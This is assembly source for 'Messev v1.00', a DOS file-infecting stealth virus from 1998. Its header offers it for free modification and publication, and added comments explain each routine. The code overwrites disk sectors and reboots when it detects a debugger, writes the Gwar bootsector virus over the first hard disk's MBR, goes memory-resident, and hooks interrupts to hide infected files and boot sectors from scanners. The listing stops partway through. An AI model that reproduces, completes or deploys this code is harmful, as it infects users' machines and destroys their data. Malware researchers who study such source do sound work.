;============================================================================
;
; NAME: Messev v1.00
; TYPE: Parasitic resident full stealth .EXE-infector.
; PURPOSE: Designed to drop the [Gwar v1.10] bootsector-virus.
; SIZE: Over 2776 bytes.
; AUTHOR: T-2000 / Invaders.
; DATE: March 1998 / May 1998.
;
; Capabilities:
;
; - Tunneling on INT 13h and INT 21h.
; - Variable encrypting.
; - Full stealth, (SFT-stealth however...).
; - Drops bootsector-virus.
; - Hides bootsectors/MBRs infected with Gwar.
; - Completely invisible for TBSCAN (adds parameters, uses INTs).
; - Anti-tracer: detects tracers (trashes bootsector).
; - Disables stealth on execution archivers (works with PKZIP).
; - Anti-debugging tricks.
;
;
; PROBLEMS:
;
; There are still some things to do, like:
;
; - Stealth filereads without SFT's.
; - Determination of system-handles via IOCTL (function 44h). *DONE*
; - Dummy-critical errorhandler. *DONE*
;
; BUGS:
; - DEBUG crashes on exit after port-access.
; - Stack isn't right in carrier. *FIXED*
; - ARJ exits with a Divide Error. *FIXED*
; - The SBB causes some programs to crash (see above), despite
; being correct. (fixed by removal).
; - Invircible terminates with a runtime-error, this is caused
; by hooking function 4301h (set file attributes).
;
; Can somebody tell me why the port-access is screwing things up?
; It's a real pain in mah ass!
;
;
;
;
; Structure: HOST + PADDING + VIRUS + PADDING + HEADER.
;
; This virus is dedicated to a very pretty woman who was on Dutch television,
; called 'Gallyon van Vessem'.
;
; Since the stupid AV'ers don't assign a person's name to a virus, this
; one is not officially called 'Gallyon'. Instead 'Messev'.
;
; Stealth-marker is 60 seconds.
;
; Passes sanity-checks in anti-virus programs.
;
; When I was done with Gwar, I decided to build it inside a file-infector,
; (nobody boots from a diskette nowadays). At first I thought of a Tai-Pan-
; hack, later I decided to write my own. It turned out to be the most stealth
; virus I ever programmed.
;
; Some things were removed to make the virus a little smaller:
;
; - Zero-track hiding.
;
; Scanner detection:
; - TbScan : Only the T-flag (invalid timestamp).
; - F-Prot : Possible variant of Desperado (dis is not a hack Goddammit!)
;
;
; Some parts may look a bit messy; this is due to optimization.
; Also excuse me if there is some bad English in this source.
;
; My E-Mail: T2000_@HotMail.Com
;
; To whoever has dis source: U can do with it whatever U want:
;
; - Modify it, (just give me credit)
; - Publish it,
; - Stick it where da sun doesn't shine.
;
; LAST REMARKS: I hope 2B on #VIRUS very soon!
;
;============================================================================
.MODEL TINY ; Single segment: code, data and stack share one 64K segment.
.STACK 4096 ; Stack for the carrier build (cf. "Stack isn't right in carrier" above).
.CODE
ORG 0 ; Body offsets start at 0, so the same image runs in the carrier and after the REP MOVSB copy in Make_Resident.
; Length of the body in bytes: everything between Virus_Begin and Virus_End.
Virus_Size EQU OFFSET Virus_End - OFFSET Virus_Begin
; Memory carved off the top of conventional RAM, in 16-byte paragraphs:
; twice the body size plus 128 bytes. Why twice is not shown here --
; presumably working space (Buffer, stack) past the code; confirm at Virus_End.
Virus_Mem_Size EQU ((Virus_Size * 2) / 16) + (128 / 16)
; In-memory residency handshake: INT 21h with AX=Residency_Check is answered
; with AX=Marker_Mem by the resident copy (see Not_Traced). Such a fixed
; probe/answer pair is also a reliable way for a scanner to confirm that
; this code is active in memory.
Marker_Mem EQU 921Fh
Marker_File EQU 0F0B1h ; File-level marker; not referenced in this part of the source.
Residency_Check EQU 0DCD0h
; Interrupt numbers used as Trace_Mode values for Tracer (the vectors
; that get tunnelled; Tracer itself is defined elsewhere).
Bios EQU 13h
Dos EQU 21h
; Start of the body that is copied to memory and appended to hosts
; (its length is Virus_Size).
Virus_Begin:
; The Gwar boot-sector image is assembled inline here; Gwar_Dropper writes
; it over the MBR of the first hard disk (INT 13h AH=03h, CX=1, DL=80h).
Gwar_Boot: INCLUDE GWAR.ASM ; Bootsector-virus.
;----------------------------------------------------------------------------
; Entry: first instruction executed in an infected host. Runs an anti-tracer
; check and then either destroys disk data (Trash_RAM) or continues with
; the residency check (Not_Traced).
;
; Anti-tracer check: after PUSH AX / POP AX the word just below SP still
; holds AX unless a single-step handler has pushed its own frame over it
; in between. SP is moved back over that word and it is re-read into BX.
;----------------------------------------------------------------------------
Entry:
CLI ; Detect if a tracer is used.
PUSH AX
POP AX
DEC SP ; SP -= 2 without an immediate operand.
DEC SP
POP BX ; BX = the word that PUSH AX left below SP.
STI
CMP AX, BX ; Word correct?
JE Not_Traced ; Then continue execution.
; === Our retaliation ===
; Destructive payload, reached only when a tracer was detected: one sector
; (DX=0180h -> head 1, drive 80h; CX=01h -> cylinder 0, sector 1) is
; overwritten through the tunnelled BIOS entry with whatever ES:BX points
; at (neither is set here), then the machine is rebooted. Head 0 is
; spared because that is where the dropped Gwar MBR lives.
Trash_RAM:
MOV Trace_Mode, Bios ; Find BIOS-entrypoint.
CALL Tracer
MOV AX, 0301h ; Trash bootsector & part
MOV CX, 01h ; of FAT with garbage.
MOV DX, 0180h ; (don't hurt our child).
CALL BiosInt
INT 19h ; Reboot system.
;----------------------------------------------------------------------------
; Not_Traced: residency check. INT 21h with AX=Residency_Check (0DCD0h) is
; answered with AX=Marker_Mem (921Fh) by the resident copy (the responding
; handler is not in this part of the source). Falls through to Exec_Host
; when already resident.
;----------------------------------------------------------------------------
Not_Traced:
MOV AX, Residency_Check ; Call residency-check.
INT 21h
CMP AX, Marker_Mem ; Are we already TSR?
JNE Make_Resident
;----------------------------------------------------------------------------
; Exec_Host: hand control to the original program. Old_Entry and Old_Stack
; (defined elsewhere) hold the host's CS:IP and SS:SP, presumably as taken
; from its original EXE header, relative to the load segment; both are
; relocated by adding PSP+10h. Old_Entry+2 is patched in place.
; Reached both from the first-run path and, via Relocated2, from the
; high-memory copy.
;----------------------------------------------------------------------------
Exec_Host:
CALL Pop_All ; Pop_All is defined elsewhere; what it restores is not visible here.
MOV AX, ES ; ES = PSP segment on EXE entry.
ADD AX, 10h ; Plus PSP.
ADD CS:Old_Entry+2, AX ; Add effective segment.
ADD AX, CS:Old_Stack+2 ; Plus old SS.
CLI
MOV SS, AX ; Restore stack.
MOV SP, CS:Old_Stack
STI
;IN AL, 21h ; Unlock keyboard.
;AND AL, NOT 02h
;OUT 21h, AL
XOR AX, AX ; Clear AX.
JMP DWORD PTR CS:Old_Entry ; JMP to host.
;----------------------------------------------------------------------------
; Make_Resident: go resident by shrinking the program's own memory block.
; AH=62h returns the PSP segment in BX; the MCB is one paragraph below it.
; Installation is only attempted when that MCB is the last in the chain
; ('Z'); otherwise the host is started without installing.
;
; MCB+03h = block size in paragraphs; MCB+12h = PSP+02h = top-of-memory
; segment. Both are reduced by Virus_Mem_Size, the body is copied to the
; new top segment, and execution continues there at Relocated2 via RETF.
;----------------------------------------------------------------------------
Make_Resident:
MOV AH, 62h ; Get PSP, (screws some
INT 21h ; debuggers).
DEC BX ; Get our MCB.
MOV DS, BX
CMP BYTE PTR DS:[0], 'Z' ; We want the last MCB.
JNE Exec_Host ; Don't install when not.
SUB WORD PTR DS:[03h], Virus_Mem_Size ; Shrink our block...
SUB WORD PTR DS:[12h], Virus_Mem_Size ; ...and the PSP's top-of-memory word (PSP:02h).
MOV ES, DS:[12h] ; ES = segment of the carved-out area.
PUSH CS
POP DS
CLD ; Copy virus to high-mem.
XOR SI, SI
XOR DI, DI
MOV CX, Virus_Size
REP MOVSB ; DS:0 -> ES:0, Virus_Size bytes.
MOV AX, OFFSET Relocated2
PUSH ES ; JMP to relocated virus.
PUSH AX
RETF ; Far jump to ES:Relocated2 inside the copy.
; Plain-text banner carried in the body (never executed). It is present
; unchanged in every infected file and in the resident copy, i.e. it is a
; straightforward static signature.
DB '=[ Messev v1.00, (c) 1998 by T-2000 / Invaders ]='
;----------------------------------------------------------------------------
; Relocated2: continues in the high-memory copy (CS = new segment).
; Initialises the Status byte, probes the DOS OEM id to decide whether
; SFT-based read stealth can be used, tunnels INT 21h / INT 13h, hooks both
; vectors, drops Gwar, then returns to the host via Exec_Host.
;----------------------------------------------------------------------------
Relocated2:
PUSH CS
POP DS
; Status: Bits
;
; 0 Infect mode.
; 1 Filesize stealth mode.
; 2 Read-stealth mode.
;
MOV Status, 00000011b ; Infect + filesize stealth on; read stealth only after the OEM check.
MOV AX, 3000h ; Get DOS-version (OEM).
INT 21h ; BH = OEM number.
CMP BH, 0FFh ; Microsoft MS-DOS?
JE SFT_Supported
CMP BH, 0EEh ; Digital Research DR-DOS?
JNE No_SFTs
SFT_Supported: OR Status, 00000100b ; Read-stealth enabled.
No_SFTs:
MOV AL, Status ; Save initial status.
MOV Init_Status, AL
MOV Trace_Mode, Dos ; Find DOS-entrypoint.
CALL Tracer
MOV Trace_Mode, Bios ; Find BIOS-entrypoint.
CALL Tracer
MOV AL, 13h ; Hook INT 13h.
MOV BX, OFFSET Stealth_Int13h ; Stealth-handler for MBR.
MOV CX, CS
CALL SetInt
CALL Gwar_Dropper ; Install our lil' present.
; The byte below is Gwar_Dropper's return address: the dropper pops that
; address and stores 90h through it ("Remove breakpoint"). This NOP is
; therefore rewritten on every install and must stay exactly one byte.
NOP ; Leave dis here!
MOV AL, 21h ; Hook INT 21h.
MOV BX, OFFSET NewInt21h
MOV CX, CS
CALL SetInt
JMP Exec_Host
; See if Gwar is already installed, or else install.
; Because we use the tunnelled vector, we can read beyond Gwar's stealth.
;----------------------------------------------------------------------------
; Gwar_Dropper: install the Gwar boot-sector virus on the first hard disk.
; Disk I/O goes through BiosInt (the tunnelled INT 13h entry), so an
; already resident Gwar cannot stealth the MBR from this routine; only the
; residency probe uses the live INT 13h vector on purpose.
;
; Steps:
;  1. Delete the file named at Port_Driver (INT 21h AH=41h; string is
;     defined elsewhere -- the author calls it a Win95 port-access driver).
;  2. Gwar residency probe: INT 13h with AX=Marker_Mem_Gwar; an answer of
;     AX=NOT Marker_Mem_Gwar means Gwar is resident -> abort.
;  3. Reset the hard disk (AH=0Dh, DL=80h), then store 90h through our own
;     return address (anti-breakpoint; that byte is the NOP after the CALL
;     in Relocated2, so this is self-modification of the resident body).
;  4. Read the MBR (C0/H0/S1, DL=80h) into Buffer; abort on error or when
;     it already carries Marker_Boot at [Signature].
;  5. Write the original MBR to C0/H0/S2, then write Gwar_Boot over S1.
;
; Recovery note: the original MBR is left in cylinder 0, head 0, sector 2;
; Stealth_Int13h later reads it back from the CHS recorded in the infected
; sector (Stored_TS/Stored_HD). The final write carries no error check.
; Clobbers: AX, BX, CX, DX, flags.
;----------------------------------------------------------------------------
Gwar_Dropper:
; Delete port-access driver, so Gwar can infect under Win95. (Same method
; as used in Hare virus).
MOV AH, 41h ; Delete driver.
MOV DX, OFFSET Port_Driver ; DS:DX = filename (DS = CS here).
CALL DosInt
MOV AX, Marker_Mem_Gwar ; Gwar residency-check.
INT 13h ; Live vector on purpose, so a resident Gwar can answer.
CMP AX, NOT Marker_Mem_Gwar ; Gwar resident?
JE Exit_Installer ; If so, don't install.
MOV AH, 0Dh ; Reset harddisk.
MOV DL, 80h
CALL BiosInt
POP BX ; POP return address to BX.
PUSH BX ; PUSH it back.
MOV BYTE PTR [BX], 90h ; Remove breakpoint. (Writes into the resident code.)
MOV AX, 0201h ; Read MBR of 1st harddisk.
MOV BX, OFFSET Buffer ; ES:BX = Buffer; ES is assumed to still be CS here -- confirm Tracer/SetInt keep it.
MOV CX, 01h
MOV DX, 80h
CALL BiosInt
JC Exit_Installer
CMP [BX+Signature], Marker_Boot ; Already infected?
JE Exit_Installer ; Then abort drop.
MOV AX, 0301h ; Store original MBR.
MOV CX, 02h ; ...in cylinder 0, head 0, sector 2 (BX still = Buffer).
MOV DX, 80h
CALL BiosInt
JC Exit_Installer
MOV AX, 0301h ; Write Gwar to MBR.
MOV BX, OFFSET Gwar_Boot
MOV CX, 01h
MOV DX, 80h
CALL BiosInt ; No error check on this last write.
Exit_Installer:
RETN
;----------------------------------------------------------------------------
; Stealth_Int13h: INT 13h filter installed by Relocated2.
; Only AH=02h (read) with DH=0 and CX=1 -- the boot sector / MBR of any
; drive -- is examined; everything else is chained to the saved vector
; Int13h. The real read is performed first; if the sector that came back
; carries Marker_Boot at [Signature], the original sector is read instead,
; from the CHS recorded in the infected sector (Stored_TS/Stored_HD), into
; the same caller buffer ES:BX. A failed read is returned untouched.
; Exits with RETF 2, discarding the caller's pushed flags; whether Pop_All
; restores the flags from BiosInt is not visible here.
; Because the match is on AH=02h/DH=0/CX=1 only, the filter covers classic
; CHS boot-sector reads through this vector and nothing else.
;----------------------------------------------------------------------------
Stealth_Int13h:
CMP AH, 02h ; Read?
JNE JMP_Int13h
OR DH, DH ; Zero-head.
JNZ JMP_Int13h
CMP CX, 01h ; Bootsector?
JNE JMP_Int13h
CALL BiosInt ; Execute function.
CALL Push_All
JC Exit_Stealth_i13h ; Exit if error occurred.
CMP ES:[BX+Signature], Marker_Boot ; Infection marker in the sector just read?
JNE Exit_Stealth_i13h
MOV AX, 0201h ; Read original bootsector.
MOV CX, ES:[BX+Stored_TS] ; Track/sector where the original was stored.
MOV DX, ES:[BX+Stored_HD] ; Head/drive where the original was stored.
CALL BiosInt
Exit_Stealth_i13h:
CALL Pop_All
RETF 2
JMP_Int13h: JMP DWORD PTR CS:Int13h
; <=== S T E A L T H R O U T I N E S ===>
;----------------------------------------------------------------------------
; Stealth_Filesize_FCB: directory-size stealth for FCB-style search results
; (which INT 21h functions are routed here is decided in NewInt21h, not
; shown). Runs the real call first; then, when Status bit 1 is set and AL
; reports no error, patches the FCB in the DTA: a seconds field of 11110b
; (30 x 2 s = "60 seconds", the infection marker) is cleared and
; Virus_Size+16+24 is subtracted from the 32-bit size at offset 1Dh.
; Extended FCBs (first byte 0FFh) carry a 7-byte prefix that is skipped.
; Note the error test here is on AL, not CF (cf. Stealth_Filesize).
;----------------------------------------------------------------------------
Stealth_Filesize_FCB:
CALL DosInt ; Run the real function first.
CALL Push_All
TEST CS:Status, 00000010b ; Filesize stealth enabled?
JZ Error_FCB
OR AL, AL ; Error?
JNZ Error_FCB
MOV AH, 2Fh ; Get DTA-address.
CALL DosInt ; ES:BX = DTA.
CMP BYTE PTR ES:[BX], 0FFh ; Extended FCB?
JNE Normal_FCB
ADD BX, 7 ; Skip extended stuff.
Normal_FCB: MOV AL, ES:[BX+17h] ; Low byte of file time (seconds/2 in bits 0-4).
AND AL, 00011111b ; Infected stamp?
CMP AL, 00011110b
JNE Error_FCB
AND BYTE PTR ES:[BX+17h], 11100000b ; Show 0 seconds.
SUB WORD PTR ES:[BX+1Dh], (Virus_Size + 16 + 24) ; Hide body + 16 (presumably padding) + 24-byte stored header.
SBB WORD PTR ES:[BX+1Fh], 0
Error_FCB:
CALL Pop_All
RETF 2
; Subtract the virussize from infected files' length & clear 60 seconds.
;----------------------------------------------------------------------------
; Stealth_Filesize: directory-size stealth for handle-style search results
; (FindFirst/FindNext DTA layout: time at 16h, size dword at 1Ah/1Ch).
; Runs the real call first; on CF=0 and Status bit 1 set, a seconds field
; of 11110b ("60 seconds", the infection marker) is cleared to 0 and
; Virus_Size+16+24 is subtracted from the reported size.
; Scanners that read the directory entry through another path, or that
; compare the reported size against the allocated size, see the raw value.
;----------------------------------------------------------------------------
Stealth_Filesize:
CALL DosInt ; Execute function.
CALL Push_All
JC No_Filesize_Stealth ; Abort when error.
TEST CS:Status, 00000010b ; Filesize stealth enabled?
JZ No_Filesize_Stealth ; No, then abort.
MOV AH, 2Fh ; Get DTA-address.
CALL DosInt ; ES:BX = DTA.
MOV AL, ES:[BX+16h] ; Get seconds-field.
AND AL, 00011111b ; Mask seconds.
CMP AL, 00011110b ; Equal to 60 seconds?
JNE No_Filesize_Stealth ; No stealth when not.
AND BYTE PTR ES:[BX+16h], 11100000b ; 0 seconds.
SUB WORD PTR ES:[BX+1Ah], (Virus_Size + 16 + 24) ; Hide body + 16 (presumably padding) + 24-byte stored header.
SBB WORD PTR ES:[BX+1Ch], 0
No_Filesize_Stealth:
CALL Pop_All
RETF 2 ; Return 2 caller.
; Prevents readings after virtual file & redirect readings from header.
;----------------------------------------------------------------------------
; Stealth_File_Read: filter for INT 21h AH=3Fh (read) on infected files.
; Requires SFT read-stealth (Status bit 2), a real file handle
; (Check_Handle, ZF=1) and the 60-second stamp (Check_Stamp, ZF=1);
; otherwise falls back to No_Stealth_Read -> Continue (the generic
; pass-through, defined elsewhere).
;
; Mechanism: the SFT entry (ES:DI from Get_DCB) has its file-size dword at
; +11h/+13h temporarily reduced by Virus_Size+16+24 so DOS itself stops the
; read at the virtual end of file; the size is restored afterwards.
; If the read started inside the first 24 bytes (the EXE header, which is
; patched in the infected file), the original header -- kept as the last
; 24 bytes of the file -- is read on top of the caller's buffer, after
; which the file position is put back.
;
; File_Pos holds the pre-read position with the HIGH word first
; (File_Pos = ES:[DI+17h], File_Pos+2 = ES:[DI+15h]); keep that in mind
; when reading the comparisons below. Read_Bytes is saved but not consulted
; in this block. Save_File_Pos / Go_End_File / Restore_File_Pos are not
; shown; Go_End_File is assumed to return the file length in DX:AX.
;----------------------------------------------------------------------------
Stealth_File_Read:
CALL Push_All
MOV CS:Read_Buffer, DS ; Caller's buffer segment.
TEST CS:Status, 00000100b ; Can we use SFT-stealth?
JZ JMP_No_Stealth
MOV CS:Read_Bytes, CX ; Save # of bytes to read.
MOV CS:Read_Buffer+2, DX ; Caller's buffer offset.
CALL Check_Handle ; Dis is a filehandle?
JNZ JMP_No_Stealth ; Abort when it isn't.
CALL Check_Stamp ; Infected timestamp?
JZ Stealth_Read
JMP_No_Stealth: JMP No_Stealth_Read
Stealth_Read:
CALL Get_DCB ; Get the SFT-address.
MOV AX, ES:[DI+17h] ; Pos. before read hi.
MOV CS:File_Pos, AX
MOV AX, ES:[DI+15h] ; Pos. before read lo.
MOV CS:File_Pos+2, AX
SUB WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24) ; Shrink SFT file size to the virtual length.
SBB WORD PTR ES:[DI+13h], 0
CALL Pop_All
CALL DosInt ; Execute function.
CALL Push_All
JC Abort_Stealth ; Abort when error.
CALL Get_DCB
ADD WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24) ; Restore the real size.
ADC WORD PTR ES:[DI+13h], 0
PUSH CS
POP DS
CMP File_Pos, 0 ; Reading 1st 64k?
JNZ Abort_Stealth ; Abort when not.
CMP File_Pos+2, 24 ; Reading header?
JA Abort_Stealth ; Abort when not.
CALL Save_File_Pos
CALL Go_End_File ; Go to position of old
SUB AX, 24 ; header at end of file.
SBB DX, 0
ADD AX, File_Pos+2 ; Pos in header.
ADC DX, 0
MOV ES:[DI+17h], DX ; Pos. old header.
MOV ES:[DI+15h], AX ; Pos. old header.
MOV AH, 3Fh ; Read original header
MOV CX, 24 ; into caller's buffer.
SUB CX, File_Pos+2 ; CX = 24 - header offset the caller started at.
MOV DX, Read_Buffer+2
MOV DS, Read_Buffer
CALL DosInt
CALL Restore_File_Pos
Abort_Stealth:
CALL Pop_All
RETF 2 ; Return to caller.
No_Stealth_Read:
CALL Pop_All
JMP Continue
; Prevents lseeks beyond virtual file.
;----------------------------------------------------------------------------
; Stealth_Fileseek: filter for INT 21h AH=42h (lseek) on infected files.
; Same SFT size trick as Stealth_File_Read: the size dword at ES:[DI+11h]
; is reduced by Virus_Size+16+24 around the real call and restored after,
; so (presumably) seeks measured from end of file land at the virtual end.
; Requires Status bit 2 and the 60-second stamp (Check_Stamp). Unlike the
; read filter there is no Check_Handle call and no CF test on the result.
; Exits with RETF 2; which flags the caller sees depends on Pop_All.
;----------------------------------------------------------------------------
Stealth_Fileseek:
CALL Push_All
TEST CS:Status, 00000100b ; Readstealth?
JZ No_Stealth_lseek
CALL Check_Stamp ; Infected stamp?
JNZ No_Stealth_Lseek
CALL Get_DCB ; ES:DI = SFT entry.
SUB WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24) ; Shrink SFT file size to the virtual length.
SBB WORD PTR ES:[DI+13h], 0
CALL Pop_All
CALL DosInt ; Execute function.
CALL Push_All
CALL Get_DCB
ADD WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24) ; Restore the real size.
ADC WORD PTR ES:[DI+13h], 0
CALL Pop_All
RETF 2
No_Stealth_lseek:
CALL Pop_All
JMP Continue
; DS:DX = Filename.
Clean_By_File:
CALL Push_All